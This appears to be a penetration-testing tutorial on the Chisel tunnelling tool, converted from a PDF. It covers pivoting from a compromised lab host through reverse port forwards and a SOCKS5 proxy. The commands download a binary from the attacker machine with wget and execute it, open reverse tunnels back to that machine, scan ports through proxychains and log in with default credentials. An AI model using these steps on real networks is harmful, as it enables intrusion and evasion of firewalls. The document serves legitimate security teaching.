Chisel

Download as pdf or txt
Download as pdf or txt
You are on page 1of 17

Page 1 of 17

Contents
Background of Port forwarding: ..................................................... 3
Introduction to Chisel..................................................................... 3
Establish a connection with the remote host .................................. 3
Installation .................................................................................... 4
Local port forwarding Example - 1 .................................................. 5
Local Port forwarding Example - 2 .................................................. 7
Establish Connection with SOCKS5 Proxy ........................................ 9
Configure SOCKS5 in proxychains4.conf file .................................. 12
Banner grabbing of the remote host with proxychains .................. 13
Telnet Connection using proxychains ........................................... 13
FTP connection using proxychains ................................................ 14
VNC Viewer connection using proxychains ................................... 15
Conclusion: .................................................................................. 17

Page 2 of 17
A Detailed Guide on Chisel

Background of Port forwarding:


Port forwarding in a computer network, also known as port mapping of network address transition
(NAT), redirects a communication request from one address and port number combination to another
while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted
traffic off. A network administrator uses one IP address for all external communications on the
internet while dedicating multiple servers with different IPS and ports internally to do various tasks
based on organization requirements.

Introduction to Chisel
Chisel is open-sourced tool written in Go (Golang) language, mainly useful for passing through
firewalls, though it can also be used to provide a secure endpoint into your network. It is a fast
TCP/UDP tunnel, transported over HTTP and secured via SSH. In addition, it requires two things to
establish a connection between a remote host and the attacking box, where the attacking box will act
as the server and the remote host as a client.

Establish a connection with the remote host


We are establishing a connection with the remote host with valid credentials. The remote host can be
a target and tunneling point for the next hop. If there is another hop we can connect with, then the
remote host will act as a routing point. We connected as the pentest user with the host using SSH
protocol which stands for secure socket shell and transmits data in encrypted form. Once we connect
with the remote host, we will view the internal network status, which can be achieved using the
following commands.
-a all interface
-n show ip address
-t show tcp connections
-p show process id/name

ssh [email protected]
netstat -antp

Page 3 of 17
Installation
Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can
install it using the below command.

apt install chisel

Page 4 of 17
Local port forwarding Example - 1
In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here
we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the
first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.

Once our Chisel server is ready and reverse tunneling is enabled, we will be required to transfer a
chisel binary to the remote host. The chisel binaries can be downloaded from the official repository
based on the system architecture. All the latest available binaries can be found by accessing the
releases tab. As we will test it on a Linux system with AMD64 architecture, we selected the highlighted
one.

Download link: https://github.com/jpillora/chisel/releases

Page 5 of 17
After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will
unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target
system to set up a chisel as a client. To transfer the file, we set up a python server in our local system,
which will host our file on port 80.

1. git clone https://github.com/jpillora/chisel.git


2. gunzip chisel_1.7.7_linux_amd64.gz
3. python3 -m http.server 80

We downloaded the chisel binary in the remote host's /tmp directory, where everyone has full
permission on files. Then we give full permission to file so we can execute it. Suppose we do not give
appropriate permission to file. In that case, we cannot execute it as it is set only to read permission
when we download anything in the temp directory as a low-privileged user. To establish a remote
connection, we require a chisel server and a chisel client where the chisel server is the Attacking box,
and the chisel server will be the target machine. As we have already set up a chisel server on port
5000 earlier, we are establishing a connection with the server. In this example, we mentioned chisel
as a client and gave the server IP address and port number (5000). We then mentioned an accessing
port (4444) and localhost with a port where HTTP service is hosted internally in the remote system.

1. wget 192.168.1.205/chisel_1.7.7_linux_amd64
2. chmod 777 chisel_1.7.7_linux_amd64
3. ./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080

Page 6 of 17
Local Port forwarding Example - 2
There is another way to access the HTTP service using the attacker's IP address instead of the loopback
interface this time. We will be required to install a chisel in the target machine to achieve the goal. In
this example, we are using the ubuntu system. As the chisel is written in Golang language, we need to
install Golang in the target system using the below command.

apt install golang

Next, we download a chisel from its official repository to install it in the target system. Go build is an
automatic build tool that aims to replace Make files for simple projects written in the Go programming
language. It creates a dependency graph of all local imports and compiles them in the correct order
using the GC Go compiler. The ldflags stands for linker flags and is used to pass in flags to the
underlying linker in the Go toolchain. The -s and -w linker flags are not strictly needed, but they
decrease the size of the resulting binary. By navigating the download folder of the chisel, we simply
installed it with the help of go build.

1. git clone https://github.com/jpillora/chisel.git


2. apt install golang
3. go build -ldflags=" -s -w"

Page 7 of 17
Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last
example, we accessed it from the attacking box loopback interface, connecting to the service hosted
in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker
side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205)
and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback
(127.0.0.1) on remote port 8888.

./chisel client 192.168.1.205:5000 R:8888:localhost:8080

When a connection is established with the chisel server, we can access the HTTP service from the
attacking box on port 8888.

Page 8 of 17
Establish Connection with SOCKS5 Proxy
During the internal assessment, we may come across when we compromise a system, and that system
is communicating with another system using a different adaptor or a different subnet. It can be
checked using ipconfig/ifconfig, where we can view if that system is connected to a different network
via a different adapter. In such scenarios, local port forwarding will not work, and we have to identify
which ports are open for the outbound traffic. As shown in the screenshot below, we could not
establish a connection with the remote host.

To overcome this issue, we have to go through multiple steps. First, we set up a chisel server in the
attacking box on port 8000.

chisel server -p 8000 --reverse

Then we establish a connection with the chisel server from the ubuntu box mentioning remote access
on socks proxy. Just like most other proxy types, SOCKS proxies hide the client's IP address and serve
when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are
mainly used to facilitate communication with websites with firewalls and limit regular client access.
All communication can be done on SOCKS5 proxy using utilities such as proxychains or proxychain4.

Page 9 of 17
-p: listening port of the server (attacking box)

--socks5: start an internal SOCKS4/SOCKS5 proxy

--reverse: allows reverse port forwarding

./chisel client 192.168.1.205:8000 R:socks

We can also access an individual target's port using the command below. We connect with the
server hosted in the Attacking machine and then access the target service via a tunnel.

./chisel client 192.168.1.205:8000 R:8001:192.168.146.128:9001

Also, we can specify socks proxy while setting up the chisel server. In the below example, we have
set up a chisel server on port 9001 using the socks5 proxy.

chisel server -p 9001 --socks5

All the above setup is done at the system level, but how will the browser know we want to access
HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or
H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS
and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5,
which depend on the version we are using. In this example, we are using SOCKS5 and port number
1080. And no proxy for the loopback interface. It can also be done using the foxyproxy addon available
in Mozilla Firefox.

Page 10 of 17
Now we can access the services without any issues. We can verify accessing the target HTTP service
where the request will send via a proxy.

Page 11 of 17
Configure SOCKS5 in proxychains4.conf file

If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file
using any text editor. The configuration file is located in the /etc as proxychains4.conf.

To edit the configuration file, we need to comment socks4 proxy if that is configured by default and
add socks5 on the loopback interface with the port number. We can use any port, but in this example,
we use port 1080.

Page 12 of 17
Banner grabbing of the remote host with proxychains
Let's grab the banner of ports 21, 23, and 5900. Port 21 belongs to the File transfer protocol, 23 to
the telnet, and 5900 to the VNC server. FTP transfers files from different sources to different
destinations, and the telnet is used for the remote connection in the command line interface. On the
other hand, VNC can be used to establish a GUI-based remote connection. To grab the banners or
access the remote host, we have to use proxychains before using any command so the request will
be made from the tunnel that we created. From the output, it is confirmed that all three ports are
open. In our command, we have used -zvn options that stand for:

-n Do not do DNS or service lookups on specified addresses, hostnames, or ports.

-v Have nc give more verbose output.

-z Specifies that nc should only scan for listening daemons without sending any data to them.

proxychains nc -zvn 192.168.146.128 21 23 5900

Telnet Connection using proxychains


Telnet is a remoting protocol that does not encrypt the data while transmitting. It transmits data in a
plain text format. Let's establish a telnet connection with valid credentials msfadmin/msfadmin. As
expected, we successfully established a remote connection with the remote host using telnet
protocol.

proxychains telnet 192.168.146.128

Page 13 of 17
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over
Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is
considered an application layer protocol. Let's connect with the same credentials we used in telnet.
We connected to ftp successfully, and with ls command, we can list the available file in the directory.

proxychains ftp 192.168.146.128

Page 14 of 17
VNC Viewer connection using proxychains
In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and
mobile devices you want to control from. A device such as a computer, tablet, or smartphone with
installed VNC Viewer software can access and control a computer in another location. This service
runs in its default port, 5900. To establish a connection with VNC, we can use proxychains using the
vncviewer utility and the remote IP address, and we will receive a GUI-based interface.

proxychains vncviewer 192.168.146.128

Page 15 of 17
Page 16 of 17
Conclusion:
We have explored chisel briefly, which will make our Internal assessment much easier, especially
when we come across port forwarding. We have explored multiple techniques to establish a remote
session using a chisel with and without socks5 proxy. Also, we have explored proxychains role in a
tunneled connection. I hope you have learned something new today. Happy hacking!

Page 17 of 17

You might also like